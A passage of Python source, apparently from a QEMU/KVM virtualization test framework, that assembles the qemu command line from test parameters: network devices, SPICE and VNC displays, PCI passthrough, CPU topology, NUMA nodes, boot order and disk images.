cmd += ",tftp='%s'" % tftp
if bootfile and "[,bootfile=" in devices.get_help_text():
cmd += ",bootfile='%s'" % bootfile
if "[,hostfwd=" in devices.get_help_text():
for host_port, guest_port in hostfwd:
cmd += ",hostfwd=tcp::%s-:%s" % (host_port, guest_port)
else:
if ifname:
cmd += ",ifname='%s'" % ifname
if script:
cmd += ",script='%s'" % script
cmd += ",downscript='%s'" % (downscript or "no")
return cmd
def add_floppy(devices, filename, index):
cmd_list = [" -fda '%s'", " -fdb '%s'"]
return cmd_list[index] % filename
def add_tftp(devices, filename):
# If the new syntax is supported, don't add -tftp
if "[,tftp=" in devices.get_help_text():
return ""
else:
return " -tftp '%s'" % filename
def add_bootp(devices, filename):
# If the new syntax is supported, don't add -bootp
if "[,bootfile=" in devices.get_help_text():
return ""
else:
return " -bootp '%s'" % filename
def add_tcp_redir(devices, host_port, guest_port):
# If the new syntax is supported, don't add -redir
if "[,hostfwd=" in devices.get_help_text():
return ""
else:
return " -redir tcp:%s::%s" % (host_port, guest_port)
def add_vnc(devices, vnc_port, vnc_password='no', extra_params=None):
vnc_cmd = " -vnc :%d" % (vnc_port - 5900)
if vnc_password == "yes":
vnc_cmd += ",password"
if extra_params:
vnc_cmd += ",%s" % extra_params
return vnc_cmd
def add_sdl(devices):
if devices.has_option("sdl"):
return " -sdl"
else:
return ""
def add_nographic(devices):
return " -nographic"
def add_uuid(devices, uuid):
return " -uuid '%s'" % uuid
def add_pcidevice(devices, host, params, device_driver="pci-assign"):
if device_driver == "pci-assign":
if (devices.has_device("pci-assign") or
devices.has_device("kvm-pci-assign")):
dev = QDevice(device_driver, parent_bus={'type': 'pci'})
else:
dev = qemu_devices.QCustomDevice('pcidevice',
parent_bus={'type': 'pci'})
else:
if devices.has_device(device_driver):
dev = QDevice(device_driver, parent_bus={'type': 'pci'})
else:
dev = qemu_devices.QCustomDevice('pcidevice',
parent_bus={'type': 'pci'})
help_cmd = "%s -device pci-assign,\\? 2>&1" % qemu_binary
pcidevice_help = utils.system_output(help_cmd)
dev.set_param('host', host)
dev.set_param('id', 'id_%s' % host.replace(":", "."))
fail_param = []
for param in params.get("pci-assign_params", "").split():
value = params.get(param)
if value:
if bool(re.search(param, pcidevice_help, re.M)):
dev.set_param(param, value)
else:
fail_param.append(param)
if fail_param:
msg = ("parameter %s is not support in device pci-assign."
" It only support following parameter:\n %s" %
(param, pcidevice_help))
logging.warn(msg)
devices.insert(dev)
def add_spice_rhel5(devices, spice_params, port_range=(3100, 3199)):
"""
Processes spice parameters on a rhel5 host.
:param spice_params: string of space separated spice parameter names
:param port_range: tuple with the port range, default: (3100, 3199)
"""
if devices.has_option("spice"):
cmd = " -spice"
else:
return ""
spice_help = ""
if devices.has_option("spice-help"):
spice_help = commands.getoutput("%s -device \\?" % qemu_binary)
s_port = str(utils_misc.find_free_port(*port_range))
self.spice_options['spice_port'] = s_port
cmd += " port=%s" % s_port
for param in spice_params.split():
value = params.get(param)
if value:
if bool(re.search(param, spice_help, re.M)):
cmd += ",%s=%s" % (param, value)
else:
msg = ("parameter %s is not supported in spice. It "
"only supports the following parameters:\n %s"
% (param, spice_help))
logging.warn(msg)
else:
cmd += ",%s" % param
if devices.has_option("qxl"):
qxl_dev_nr = params.get("qxl_dev_nr", 1)
cmd += " -qxl %s" % qxl_dev_nr
return cmd
def add_spice(port_range=(3000, 3199),
tls_port_range=(3200, 3399)):
"""
Processes spice parameters.
:param port_range: tuple with the port range, default: (3000, 3199)
:param tls_port_range: tuple with the tls port range,
default: (3200, 3399)
"""
spice_opts = [] # will be used for ",".join()
tmp = None
def optget(opt):
"""a helper function"""
return self.spice_options.get(opt)
def set_yes_no_value(key, yes_value=None, no_value=None):
"""just a helper function"""
tmp = optget(key)
if tmp == "no" and no_value:
spice_opts.append(no_value)
elif tmp == "yes" and yes_value:
spice_opts.append(yes_value)
def set_value(opt_string, key, fallback=None):
"""just a helper function"""
tmp = optget(key)
if tmp:
spice_opts.append(opt_string % tmp)
elif fallback:
spice_opts.append(fallback)
s_port = str(utils_misc.find_free_port(*port_range))
if optget("spice_port") == "generate":
if not self.is_alive():
self.spice_options['spice_port'] = s_port
spice_opts.append("port=%s" % s_port)
self.spice_port = s_port
else:
self.spice_options['spice_port'] = self.spice_port
spice_opts.append("port=%s" % self.spice_port)
else:
set_value("port=%s", "spice_port")
set_value("password=%s", "spice_password", "disable-ticketing")
if optget("listening_addr") == "ipv4":
host_ip = utils_net.get_host_ip_address(self.params)
self.spice_options['listening_addr'] = "ipv4"
spice_opts.append("addr=%s" % host_ip)
#set_value("addr=%s", "listening_addr", )
elif optget("listening_addr") == "ipv6":
host_ip = utils_net.get_host_ip_address(self.params)
host_ip_ipv6 = utils_misc.convert_ipv4_to_ipv6(host_ip)
self.spice_options['listening_addr'] = "ipv6"
spice_opts.append("addr=%s" % host_ip_ipv6)
set_yes_no_value(
"disable_copy_paste", yes_value="disable-copy-paste")
set_value("addr=%s", "spice_addr")
if optget("spice_ssl") == "yes":
# SSL only part
t_port = str(utils_misc.find_free_port(*tls_port_range))
if optget("spice_tls_port") == "generate":
if not self.is_alive():
self.spice_options['spice_tls_port'] = t_port
spice_opts.append("tls-port=%s" % t_port)
self.spice_tls_port = t_port
else:
self.spice_options[
'spice_tls_port'] = self.spice_tls_port
spice_opts.append("tls-port=%s" % self.spice_tls_port)
else:
set_value("tls-port=%s", "spice_tls_port")
prefix = optget("spice_x509_prefix")
if ((prefix is None or not os.path.exists(prefix)) and
(optget("spice_gen_x509") == "yes")):
# Generating spice_x509_* is not always necessary;
# regenerating them would make your existing VM
# no longer accessible via encrypted spice.
c_subj = optget("spice_x509_cacert_subj")
s_subj = optget("spice_x509_server_subj")
# If CN is not specified, add IP of host
if s_subj[-3:] == "CN=":
s_subj += utils_net.get_host_ip_address(self.params)
passwd = optget("spice_x509_key_password")
secure = optget("spice_x509_secure")
utils_misc.create_x509_dir(prefix, c_subj, s_subj, passwd,
secure)
tmp = optget("spice_x509_dir")
if tmp == "yes":
spice_opts.append("x509-dir=%s" % (prefix))
elif tmp == "no":
cacert = optget("spice_x509_cacert_file")
server_key = optget("spice_x509_key_file")
server_cert = optget("spice_x509_cert_file")
keyfile_str = ("x509-key-file=%s,x509-cacert-file=%s,"
"x509-cert-file=%s" %
(os.path.join(prefix, server_key),
os.path.join(prefix, cacert),
os.path.join(prefix, server_cert)))
spice_opts.append(keyfile_str)
set_yes_no_value("spice_x509_secure",
yes_value="x509-key-password=%s" %
(optget("spice_x509_key_password")))
tmp = optget("spice_secure_channels")
if tmp:
for item in tmp.split(","):
spice_opts.append("tls-channel=%s" % (item.strip()))
# Less common options
set_value("seamless-migration=%s", "spice_seamless_migration")
set_value("image-compression=%s", "spice_image_compression")
set_value("jpeg-wan-compression=%s", "spice_jpeg_wan_compression")
set_value("zlib-glz-wan-compression=%s",
"spice_zlib_glz_wan_compression")
set_value("streaming-video=%s", "spice_streaming_video")
set_value("agent-mouse=%s", "spice_agent_mouse")
set_value("playback-compression=%s", "spice_playback_compression")
set_yes_no_value("spice_ipv4", yes_value="ipv4")
set_yes_no_value("spice_ipv6", yes_value="ipv6")
return " -spice %s" % (",".join(spice_opts))
def add_qxl(qxl_nr, qxl_memory=None):
"""
Adds extra qxl devices and sets the vram size of -vga qxl and the extra qxls.
:param qxl_nr: total number of qxl devices
:param qxl_memory: vram size to set on the individual devices
"""
qxl_str = ""
vram_help = ""
if qxl_memory:
vram_help = "vram_size=%d" % qxl_memory
qxl_str += " -global qxl-vga.%s" % (vram_help)
for index in range(1, qxl_nr):
qxl_str += " -device qxl,id=video%d,%s"\
% (index, vram_help)
return qxl_str
def add_vga(vga):
return " -vga %s" % vga
def add_kernel(devices, filename):
return " -kernel '%s'" % filename
def add_initrd(devices, filename):
return " -initrd '%s'" % filename
def add_rtc(devices):
# Pay attention that rtc-td-hack is for early qemu versions
# if "rtc " in help:
if devices.has_option("rtc"):
cmd = " -rtc base=%s" % params.get("rtc_base", "utc")
cmd += _add_option("clock", params.get("rtc_clock", "host"))
cmd += _add_option("driftfix", params.get("rtc_drift", "none"))
return cmd
elif devices.has_option("rtc-td-hack"):
return " -rtc-td-hack"
else:
return ""
def add_kernel_cmdline(devices, cmdline):
return " -append '%s'" % cmdline
def add_testdev(devices, filename=None):
if devices.has_device("testdev"):
return (" -chardev file,id=testlog,path=%s"
" -device testdev,chardev=testlog" % filename)
elif devices.has_device("pc-testdev"):
return " -device pc-testdev"
else:
return ""
def add_isa_debug_exit(devices, iobase=0xf4, iosize=0x04):
if devices.has_device("isa-debug-exit"):
return (" -device isa-debug-exit,iobase=%s,iosize=%s" %
(iobase, iosize))
else:
return ""
def add_no_hpet(devices):
if devices.has_option("no-hpet"):
return " -no-hpet"
else:
return ""
def add_cpu_flags(devices, cpu_model, flags=None, vendor_id=None,
family=None):
if devices.has_option('cpu'):
cmd = " -cpu '%s'" % cpu_model
if vendor_id:
cmd += ",vendor=\"%s\"" % vendor_id
if flags:
if not flags.startswith(","):
cmd += ","
cmd += "%s" % flags
if family is not None:
cmd += ",family=%s" % family
return cmd
else:
return ""
def add_boot(devices, boot_order, boot_once, boot_menu):
cmd = " -boot"
pattern = "boot \[order=drives\]\[,once=drives\]\[,menu=on\|off\]"
if devices.has_option("boot \[a\|c\|d\|n\]"):
cmd += " %s" % boot_once
elif devices.has_option(pattern):
cmd += (" order=%s,once=%s,menu=%s" %
(boot_order, boot_once, boot_menu))
else:
cmd = ""
return cmd
def get_index(index):
while self.index_in_use.get(str(index)):
index += 1
return index
def add_sga(devices):
if not devices.has_option("device"):
return ""
return " -device sga"
def add_watchdog(devices, device_type=None, action="reset"):
watchdog_cmd = ""
if devices.has_option("watchdog"):
if device_type:
watchdog_cmd += " -watchdog %s" % device_type
watchdog_cmd += " -watchdog-action %s" % action
return watchdog_cmd
def add_option_rom(devices, opt_rom):
if not devices.has_option("option-rom"):
return ""
return " -option-rom %s" % opt_rom
def add_smartcard(devices, sc_chardev, sc_id):
sc_cmd = " -device usb-ccid,id=ccid0"
sc_cmd += " -chardev " + sc_chardev
sc_cmd += ",id=" + sc_id + ",name=smartcard"
sc_cmd += " -device ccid-card-passthru,chardev=" + sc_id
return sc_cmd
def add_numa_node(devices, mem=None, cpus=None, nodeid=None):
"""
This function is used to add a numa node to the guest command line.
"""
if not devices.has_option("numa"):
return ""
numa_cmd = " -numa node"
if mem is not None:
numa_cmd += ",mem=%s" % mem
if cpus is not None:
numa_cmd += ",cpus=%s" % cpus
if nodeid is not None:
numa_cmd += ",nodeid=%s" % nodeid
return numa_cmd
# End of command line option wrappers
# If nothing changed and devices exist, return immediately
if (name is None and params is None and root_dir is None
and self.devices is not None):
return self.devices
if name is None:
name = self.name
if params is None:
params = self.params
if root_dir is None:
root_dir = self.root_dir
have_ahci = False
have_virtio_scsi = False
virtio_scsi_pcis = []
# init value by default.
# PCI addr 0,1,2 are taken by PCI/ISA/IDE bridge and the GPU.
self.pci_addr_list = [0, 1, 2]
# Clone this VM using the new params
vm = self.clone(name, params, root_dir, copy_state=True)
# global counters
ide_bus = 0
ide_unit = 0
vdisk = 0
scsi_disk = 0
global_image_bootindex = 0
if params.get("kernel"):
global_image_bootindex = 1
qemu_binary = utils_misc.get_qemu_binary(params)
self.qemu_binary = qemu_binary
support_cpu_model = commands.getoutput("%s -cpu \\?" % qemu_binary)
index_global = 0
# init the dict index_in_use
for key in params.keys():
if 'drive_index' in key:
self.index_in_use[params.get(key)] = True
cmd = ""
# Enable the use of glibc's malloc_perturb feature
if params.get("malloc_perturb", "no") == "yes":
cmd += "MALLOC_PERTURB_=1 "
# Set the X11 display parameter if requested
if params.get("x11_display"):
cmd += "DISPLAY=%s " % params.get("x11_display")
if params.get("qemu_audio_drv"):
cmd += "QEMU_AUDIO_DRV=%s " % params.get("qemu_audio_drv")
# Add command prefix for qemu-kvm. like taskset, valgrind and so on
if params.get("qemu_command_prefix"):
qemu_command_prefix = params.get("qemu_command_prefix")
cmd += "%s " % qemu_command_prefix
# Add numa memory cmd to pin guest memory to numa node
if params.get("numa_node"):
numa_node = int(params.get("numa_node"))
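# Negative numa_node values count from the last host node (e.g. -1 is the
# last one), while positive values are 1-based; the guest memory is then
# pinned with 'numactl -m <node>'.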
if numa_node < 0:
p = utils_misc.NumaNode(numa_node)
n = int(utils_misc.get_node_count()) + numa_node
cmd += "numactl -m %s " % n
else:
n = numa_node - 1
cmd += "numactl -m %s " % n
# Start constructing devices representation
devices = qemu_devices.DevContainer(qemu_binary, self.name,
params.get('strict_mode'),
params.get(
'workaround_qemu_qmp_crash'),
params.get('allow_hotplugged_vm'))
StrDev = qemu_devices.QStringDevice
QDevice = qemu_devices.QDevice
devices.insert(StrDev('PREFIX', cmdline=cmd))
# Add the qemu binary
devices.insert(StrDev('qemu', cmdline=qemu_binary))
devices.insert(StrDev('-S', cmdline="-S"))
# Add the VM's name
devices.insert(StrDev('vmname', cmdline=add_name(devices, name)))
if params.get("qemu_sandbox", "on") == "on":
devices.insert(StrDev('sandbox', cmdline=process_sandbox(devices, "add")))
elif params.get("sandbox", "off") == "off":
devices.insert(StrDev('qemu_sandbox', cmdline=process_sandbox(devices, "rem")))
devs = devices.machine_by_params(params)
for dev in devs:
devices.insert(dev)
# no automagic devices please
defaults = params.get("defaults", "no")
if devices.has_option("nodefaults") and defaults != "yes":
devices.insert(StrDev('nodefaults', cmdline=" -nodefaults"))
vga = params.get("vga")
if vga:
if vga != 'none':
devices.insert(StrDev('VGA-%s' % vga, {'addr': 2},
cmdline=add_vga(vga),
parent_bus={'type': 'pci'}))
else:
devices.insert(StrDev('VGA-none', cmdline=add_vga(vga)))
if vga == "qxl":
qxl_dev_memory = int(params.get("qxl_dev_memory", 0))
qxl_dev_nr = int(params.get("qxl_dev_nr", 1))
devices.insert(StrDev('qxl',
cmdline=add_qxl(qxl_dev_nr, qxl_dev_memory)))
elif params.get('defaults', 'no') != 'no': # by default add cirrus
devices.insert(StrDev('VGA-cirrus', {'addr': 2},
cmdline=add_vga(vga),
parent_bus={'type': 'pci'}))
# When old scsi fmt is used, new device with lowest pci_addr is created
devices.hook_fill_scsi_hbas(params)
# -soundhw addresses are always the lowest after scsi
soundhw = params.get("soundcards")
if soundhw:
if not devices.has_option('device') or soundhw == "all":
for sndcard in ('AC97', 'ES1370', 'intel-hda'):
# Add all dummy PCI devices and the actual command below
devices.insert(StrDev("SND-%s" % sndcard,
parent_bus={'type': 'pci'}))
devices.insert(StrDev('SoundHW',
cmdline="-soundhw %s" % soundhw))
else:
# TODO: Use QDevices for this and set the addresses properly
for sound_device in soundhw.split(","):
if "hda" in sound_device:
devices.insert(QDevice('intel-hda',
parent_bus={'type': 'pci'}))
devices.insert(QDevice('hda-duplex'))
elif sound_device in ["es1370", "ac97"]:
devices.insert(QDevice(sound_device.upper(),
parent_bus={'type': 'pci'}))
else:
devices.insert(QDevice(sound_device,
parent_bus={'type': 'pci'}))
# Add monitors
for monitor_name in params.objects("monitors"):
monitor_params = params.object_params(monitor_name)
monitor_filename = qemu_monitor.get_monitor_filename(vm,
monitor_name)
if monitor_params.get("monitor_type") == "qmp":
cmd = add_qmp_monitor(devices, monitor_name,
monitor_filename)
devices.insert(StrDev('QMP-%s' % monitor_name, cmdline=cmd))
else:
cmd = add_human_monitor(devices, monitor_name,
monitor_filename)
devices.insert(StrDev('HMP-%s' % monitor_name, cmdline=cmd))
# Add serial console redirection
for serial in params.objects("isa_serials"):
serial_filename = vm.get_serial_console_filename(serial)
cmd = add_serial(devices, serial, serial_filename)
devices.insert(StrDev('SER-%s' % serial, cmdline=cmd))
# Add virtio_serial ports
no_virtio_serial_pcis = 0
no_virtio_ports = 0
virtio_port_spread = int(params.get('virtio_port_spread', 2))
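# Spread virtio ports across virtio-serial-pci controllers: unless a bus is
# set explicitly, a new controller is created every virtio_port_spread-th
# port, otherwise the last created controller is reused.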
for port_name in params.objects("virtio_ports"):
port_params = params.object_params(port_name)
bus = params.get('virtio_port_bus', False)
if bus is not False: # Manually set bus
bus = int(bus)
elif not virtio_port_spread:
# bus not specified, let qemu decide
pass
elif not no_virtio_ports % virtio_port_spread:
# Add new vio-pci every n-th port. (Spread ports)
bus = no_virtio_serial_pcis
else: # Port not overridden, use the last vio-pci
bus = no_virtio_serial_pcis - 1
if bus < 0: # First bus
bus = 0
# Add virtio_serial_pcis
for i in range(no_virtio_serial_pcis, bus + 1):
dev = QDevice('virtio-serial-pci', parent_bus={'type': 'pci'})
dev.set_param('id', 'virtio_serial_pci%d' % i)
devices.insert(dev)
no_virtio_serial_pcis += 1
if bus is not False:
bus = "virtio_serial_pci%d.0" % bus
# Add actual ports
cmd = add_virtio_port(devices, port_name, bus,
self.get_virtio_port_filename(port_name),
port_params.get('virtio_port_type'),
port_params.get('virtio_port_chardev'),
port_params.get('virtio_port_name_prefix'),
no_virtio_ports,
port_params.get('virtio_port_params', ''))
devices.insert(StrDev('VIO-%s' % port_name, cmdline=cmd))
no_virtio_ports += 1
# Add logging
devices.insert(StrDev('isa-log', cmdline=add_log_seabios(devices)))
if params.get("anaconda_log", "no") == "yes":
add_log_anaconda(devices)
# Add USB controllers
usbs = params.objects("usbs")
if not devices.has_option("device"):
usbs = ("oldusb",) # Old qemu, add only one controller '-usb'
for usb_name in usbs:
usb_params = params.object_params(usb_name)
for dev in devices.usbc_by_params(usb_name, usb_params):
devices.insert(dev)
# Add images (harddrives)
for image_name in params.objects("images"):
# FIXME: Use qemu_devices for handling indexes
image_params = params.object_params(image_name)
if image_params.get("boot_drive") == "no":
continue
if params.get("index_enable") == "yes":
drive_index = image_params.get("drive_index")
if drive_index:
index = drive_index
else:
index_global = get_index(index_global)
index = str(index_global)
index_global += 1
else:
index = None
image_bootindex = None
image_boot = image_params.get("image_boot")
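# Newer qemu versions dropped the per-drive boot=on|off option; when the
# help output no longer advertises it, translate image_boot into a
# bootindex value instead.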
if not re.search("boot=on\|off", devices.get_help_text(),
re.MULTILINE):
if image_boot in ['yes', 'on', True]:
image_bootindex = str(global_image_bootindex)
global_image_bootindex += 1
image_boot = "unused"
image_bootindex = image_params.get('bootindex',
image_bootindex)
else:
if image_boot in ['yes', 'on', True]:
if global_image_bootindex > 0:
image_boot = False
global_image_bootindex += 1
image_params = params.object_params(image_name)
if image_params.get("boot_drive") == "no":
continue
devs = devices.images_define_by_params(image_name, image_params,
'disk', index, image_boot,
image_bootindex)
for _ in devs:
devices.insert(_)
# Networking
redirs = []
for redir_name in params.objects("redirs"):
redir_params = params.object_params(redir_name)
guest_port = int(redir_params.get("guest_port"))
host_port = vm.redirs.get(guest_port)
redirs += [(host_port, guest_port)]
iov = 0
for nic in vm.virtnet:
nic_params = params.object_params(nic.nic_name)
if nic_params.get('pci_assignable') == "no":
script = nic_params.get("nic_script")
downscript = nic_params.get("nic_downscript")
vhost = nic_params.get("vhost")
script_dir = data_dir.get_data_dir()
if script:
script = utils_misc.get_path(script_dir, script)
if downscript:
downscript = utils_misc.get_path(script_dir, downscript)
# setup nic parameters as needed
# add_netdev if netdev_id not set
nic = vm.add_nic(**dict(nic))
# gather set values or None if unset
vlan = int(nic.get('vlan'))
netdev_id = nic.get('netdev_id')
device_id = nic.get('device_id')
mac = nic.get('mac')
nic_model = nic.get("nic_model")
nic_extra = nic.get("nic_extra_params")
bootindex = nic_params.get("bootindex")
netdev_extra = nic.get("netdev_extra_params")
bootp = nic.get("bootp")
if nic.get("tftp"):
tftp = utils_misc.get_path(root_dir, nic.get("tftp"))
else:
tftp = None
nettype = nic.get("nettype", "bridge")
# don't force conversion of the add_nic()/add_net() optional parameters
if nic.has_key('tapfds'):
tapfds = nic.tapfds
else:
tapfds = None
if nic.has_key('vhostfds'):
vhostfds = nic.vhostfds
else:
vhostfds = None
ifname = nic.get('ifname')
queues = nic.get("queues", 1)
# specify the number of MSI-X vectors that the card should have;
# this option currently only affects virtio cards
if nic_params.get("enable_msix_vectors") == "yes":
if nic.has_key("vectors"):
vectors = nic.vectors
else:
vectors = 2 * int(queues) + 1
else:
vectors = None
# Handle the '-net nic' part
add_nic(devices, vlan, nic_model, mac,
device_id, netdev_id, nic_extra,
nic_params.get("nic_pci_addr"),
bootindex, queues, vectors)
# Handle the '-net tap' or '-net user' or '-netdev' part
cmd = add_net(devices, vlan, nettype, ifname, tftp,
bootp, redirs, netdev_id, netdev_extra,
tapfds, script, downscript, vhost, queues,
vhostfds)
# TODO: Is every NIC a PCI device?
devices.insert(StrDev("NET-%s" % nettype, cmdline=cmd))
else:
device_driver = nic_params.get("device_driver", "pci-assign")
pci_id = vm.pa_pci_ids[iov]
add_pcidevice(devices, pci_id, params=nic_params,
device_driver=device_driver)
iov += 1
mem = params.get("mem")
if mem:
devices.insert(StrDev('mem', cmdline=add_mem(devices, mem)))
smp = int(params.get("smp", 0))
vcpu_maxcpus = int(params.get("vcpu_maxcpus", 0))
vcpu_sockets = int(params.get("vcpu_sockets", 0))
vcpu_cores = int(params.get("vcpu_cores", 0))
vcpu_threads = int(params.get("vcpu_threads", 0))
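# Derive any unset topology values so that smp == sockets * cores * threads;
# values given explicitly in params take precedence over the computed ones.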
# Force CPU threads to 2 when smp > 8.
if smp > 8 and vcpu_threads <= 1:
vcpu_threads = 2
# Some versions of windows don't support more than 2 sockets of cpu,
# here is a workaround to make all windows use only 2 sockets.
if (vcpu_sockets and vcpu_sockets > 2
and params.get("os_type") == 'windows'):
vcpu_sockets = 2
if smp == 0 or vcpu_sockets == 0:
vcpu_cores = vcpu_cores or 1
vcpu_threads = vcpu_threads or 1
if smp and vcpu_sockets == 0:
vcpu_sockets = int(smp / (vcpu_cores * vcpu_threads)) or 1
else:
vcpu_sockets = vcpu_sockets or 1
if smp == 0:
smp = vcpu_cores * vcpu_threads * vcpu_sockets
else:
if vcpu_cores == 0:
vcpu_threads = vcpu_threads or 1
vcpu_cores = int(smp / (vcpu_sockets * vcpu_threads)) or 1
else:
vcpu_threads = int(smp / (vcpu_cores * vcpu_sockets)) or 1
self.cpuinfo.smp = smp
self.cpuinfo.maxcpus = vcpu_maxcpus or smp
self.cpuinfo.cores = vcpu_cores
self.cpuinfo.threads = vcpu_threads
self.cpuinfo.sockets = vcpu_sockets
devices.insert(StrDev('smp', cmdline=add_smp(devices)))
numa_total_cpus = 0
numa_total_mem = 0
for numa_node in params.objects("guest_numa_nodes"):
numa_params = params.object_params(numa_node)
numa_mem = numa_params.get("numa_mem")
numa_cpus = numa_params.get("numa_cpus")
numa_nodeid = numa_params.get("numa_nodeid")
if numa_mem is not None:
numa_total_mem += int(numa_mem)
if numa_cpus is not None:
numa_total_cpus += len(utils_misc.cpu_str_to_list(numa_cpus))
devices.insert(StrDev('numa', cmdline=add_numa_node(devices)))
if params.get("numa_consistency_check_cpu_mem", "no") == "yes":
if (numa_total_cpus > int(smp) or numa_total_mem > int(mem)
or len(params.objects("guest_numa_nodes")) > int(smp)):
logging.debug("-numa need %s vcpu and %s memory. It is not "
"matched the -smp and -mem. The vcpu number "
"from -smp is %s, and memory size from -mem is"
" %s" % (numa_total_cpus, numa_total_mem, smp,
mem))
raise virt_vm.VMDeviceError("The numa node cfg can not fit"
" smp and memory cfg.")
cpu_model = params.get("cpu_model")
use_default_cpu_model = True
if cpu_model:
use_default_cpu_model = False
for model in re.split(",", cpu_model):
model = model.strip()
if model not in support_cpu_model:
continue
cpu_model = model
break
else:
cpu_model = model
logging.error("Non existing CPU model %s will be passed "
"to qemu (wrong config or negative test)", model)
if use_default_cpu_model:
cpu_model = params.get("default_cpu_model")
if cpu_model:
vendor = params.get("cpu_model_vendor")
flags = params.get("cpu_model_flags")
family = params.get("cpu_family")
self.cpuinfo.model = cpu_model
self.cpuinfo.vendor = vendor
self.cpuinfo.flags = flags
self.cpuinfo.family = family
cmd = add_cpu_flags(devices, cpu_model, flags, vendor, family)
devices.insert(StrDev('cpu', cmdline=cmd))
# Add cdroms
for cdrom in params.objects("cdroms"):
image_params = params.object_params(cdrom)
# FIXME: Use qemu_devices for handling indexes
if image_params.get("boot_drive") == "no":
continue
if params.get("index_enable") == "yes":
drive_index = image_params.get("drive_index")
if drive_index:
index = drive_index
else:
index_global = get_index(index_global)
index = str(index_global)
index_global += 1
else:
index = None
image_bootindex = None
image_boot = image_params.get("image_boot")
if not re.search("boot=on\|off", devices.get_help_text(),
re.MULTILINE):
if image_boot in ['yes', 'on', True]:
image_bootindex = str(global_image_bootindex)
global_image_bootindex += 1
image_boot = "unused"
image_bootindex = image_params.get(
'bootindex', image_bootindex)
else:
if image_boot in ['yes', 'on', True]:
if global_image_bootindex > 0:
image_boot = False
global_image_bootindex += 1
iso = image_params.get("cdrom")
if iso or image_params.get("cdrom_without_file") == "yes":
devs = devices.cdroms_define_by_params(cdrom, image_params,
'cdrom', index,
image_boot,
image_bootindex)
for _ in devs:
devices.insert(_)
# We may want to add a {floppy_opts} parameter for -fda, -fdb
# {fat:floppy:}/path/. However vvfat is not usually recommended.
for floppy_name in params.objects('floppies'):
image_params = params.object_params(floppy_name)
# TODO: Unify image, cdrom, floppy params
image_params['drive_format'] = 'floppy'
image_params[
'image_readonly'] = image_params.get("floppy_readonly",
"no")
# Use the absolute path with floppies (pure *.vfd)
image_params['image_raw_device'] = 'yes'
image_params['image_name'] = utils_misc.get_path(
data_dir.get_data_dir(),
image_params["floppy_name"])
image_params['image_format'] = None
devs = devices.images_define_by_params(floppy_name, image_params,
media='')
for _ in devs:
devices.insert(_)
# Add usb devices
for usb_dev in params.objects("usb_devices"):
usb_dev_params = params.object_params(usb_dev)
devices.insert(devices.usb_by_params(usb_dev, usb_dev_params))
tftp = params.get("tftp")
if tftp:
tftp = utils_misc.get_path(data_dir.get_data_dir(), tftp)
devices.insert(StrDev('tftp', cmdline=add_tftp(devices, tftp)))
bootp = params.get("bootp")
if bootp:
devices.insert(StrDev('bootp',
cmdline=add_bootp(devices, bootp)))
kernel = params.get("kernel")
if kernel:
kernel = utils_misc.get_path(data_dir.get_data_dir(), kernel)
devices.insert(StrDev('kernel',
cmdline=add_kernel(devices, kernel)))
kernel_params = params.get("kernel_params")
if kernel_params:
cmd = add_kernel_cmdline(devices, kernel_params)
devices.insert(StrDev('kernel-params', cmdline=cmd))
initrd = params.get("initrd")
if initrd:
initrd = utils_misc.get_path(data_dir.get_data_dir(), initrd)
devices.insert(StrDev('initrd',
cmdline=add_initrd(devices, initrd)))
for host_port, guest_port in redirs:
cmd = add_tcp_redir(devices, host_port, guest_port)
devices.insert(StrDev('tcp-redir', cmdline=cmd))
cmd = ""
if params.get("display") == "vnc":
vnc_extra_params = params.get("vnc_extra_params")
vnc_password = params.get("vnc_password", "no")
cmd += add_vnc(devices, self.vnc_port, vnc_password,
vnc_extra_params)
elif params.get("display") == "sdl":
cmd += add_sdl(devices)
elif params.get("display") == "nographic":
cmd += add_nographic(devices)
elif params.get("display") == "spice":
if params.get("rhel5_spice"):
spice_params = params.get("spice_params")
cmd += add_spice_rhel5(devices, spice_params)
else:
spice_keys = (
"spice_port", "spice_password", "spice_addr", "spice_ssl",
"spice_tls_port", "spice_tls_ciphers", "spice_gen_x509",
"spice_x509_dir", "spice_x509_prefix",
"spice_x509_key_file", "spice_x509_cacert_file",
"spice_x509_key_password", "spice_x509_secure",
"spice_x509_cacert_subj", "spice_x509_server_subj",
"spice_secure_channels", "spice_image_compression",
"spice_jpeg_wan_compression",
"spice_zlib_glz_wan_compression", "spice_streaming_video",
"spice_agent_mouse", "spice_playback_compression",
"spice_ipv4", "spice_ipv6", "spice_x509_cert_file",
"disable_copy_paste", "spice_seamless_migration",
"listening_addr"
)
for skey in spice_keys:
value = params.get(skey, None)
if value:
self.spice_options[skey] = value
cmd += add_spice()
if cmd:
devices.insert(StrDev('display', cmdline=cmd))
if params.get("uuid") == "random":
cmd = add_uuid(devices, vm.uuid)
devices.insert(StrDev('uuid', cmdline=cmd))
elif params.get("uuid"):
cmd = add_uuid(devices, params.get("uuid"))
devices.insert(StrDev('uuid', cmdline=cmd))
if params.get("testdev") == "yes":
cmd = add_testdev(devices, vm.get_testlog_filename())
devices.insert(StrDev('testdev', cmdline=cmd))
if params.get("isa_debugexit") == "yes":
iobase = params.get("isa_debugexit_iobase")
iosize = params.get("isa_debugexit_iosize")
cmd = add_isa_debug_exit(devices, iobase, iosize)
devices.insert(StrDev('isa_debugexit', cmdline=cmd))
if params.get("disable_hpet") == "yes":
devices.insert(StrDev('nohpet', cmdline=add_no_hpet(devices)))
devices.insert(StrDev('rtc', cmdline=add_rtc(devices)))
if devices.has_option("boot"):
boot_order = params.get("boot_order", "cdn")
boot_once = params.get("boot_once", "c")
boot_menu = params.get("boot_menu", "off")
cmd = add_boot(devices, boot_order, boot_once, boot_menu)
devices.insert(StrDev('bootmenu', cmdline=cmd))
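# Optional virtio-9p export: build the -fsdev option according to the chosen
# 9p_fs_driver (local, handle or proxy) and attach a virtio-9p-pci device
# using the mount tag 'autotest_tag'.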
p9_export_dir = params.get("9p_export_dir")
if p9_export_dir:
cmd = " -fsdev"
p9_fs_driver = params.get("9p_fs_driver")
if p9_fs_driver == "handle":
cmd += " handle,id=local1,path=" + p9_export_dir
elif p9_fs_driver == "proxy":
cmd += " proxy,id=local1,socket="
else:
p9_fs_driver = "local"
cmd += " local,id=local1,path=" + p9_export_dir
# security model is needed only for local fs driver
if p9_fs_driver == "local":
p9_security_model = params.get("9p_security_model")
if not p9_security_model:
p9_security_model = "none"
cmd += ",security_model=" + p9_security_model
elif p9_fs_driver == "proxy":
p9_socket_name = params.get("9p_socket_name")
if not p9_socket_name:
raise virt_vm.VMImageMissingError("Socket name not "
"defined")
cmd += p9_socket_name
p9_immediate_writeout = params.get("9p_immediate_writeout")
if p9_immediate_writeout == "yes":
